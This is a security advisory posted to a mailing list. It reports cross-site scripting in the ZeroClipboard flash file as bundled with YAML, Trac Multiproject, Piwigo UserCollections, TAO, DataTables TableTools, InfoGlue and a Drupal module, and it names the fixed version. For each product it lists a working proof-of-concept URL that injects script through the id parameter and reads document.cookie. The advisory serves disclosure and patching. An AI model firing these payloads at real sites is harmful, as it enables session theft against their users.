Various Applications Include ZeroClipboard XSS

`Hello list!  
  
These are Cross-Site Scripting vulnerabilities in YAML, MultiProject  
extension for Trac, UserCollections extension for Piwigo, TAO and TableTools  
plugin for DataTables plugin for jQuery (with ZeroClipboard.swf).  
  
Earlier I've wrote about Cross-Site Scripting vulnerabilities in  
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote  
that this is very widespread flash-file and it's placed at tens of thousands  
of web sites. And it's used in hundreds of web applications. Among them are  
YAML, Multiproject for Trac, UserCollections for Piwigo, TAO and TableTools  
for DataTables for jQuery. And there are many other vulnerable web  
applications with ZeroClipboard.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are the next web applications with ZeroClipboard:  
  
YAML 4.0.2 and previous versions.  
  
Multiproject extension for Trac: Multiproject 1.4.21 and previous versions.  
  
UserCollections extension for Piwigo.  
  
TAO 2.3.1 and previous versions.  
  
TableTools plugin for DataTables plugin for jQuery. Particularly it's  
bundled with InfoGlue 2.1 (and previous versions) and OGDI Field 6.x-1.0  
(and previous versions) for Drupal.  
  
Both XSS vulnerabilities in ZeroClipboard are fixed in latest version (by  
new developers), such as ZeroClipboard 1.1.7. All developers should update  
swf-file in their software.  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
XSS via id parameter and XSS via copying payload into buffer (as described  
in previous advisory).  
  
YAML:  
  
http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
Multiproject extension for Trac:  
  
http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
UserCollections extension for Piwigo:  
  
http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
TAO:  
  
http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
TableTools plugin for DataTables plugin for jQuery:  
  
http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
InfoGlue:  
  
http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
OGDI Field for Drupal:  
  
http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`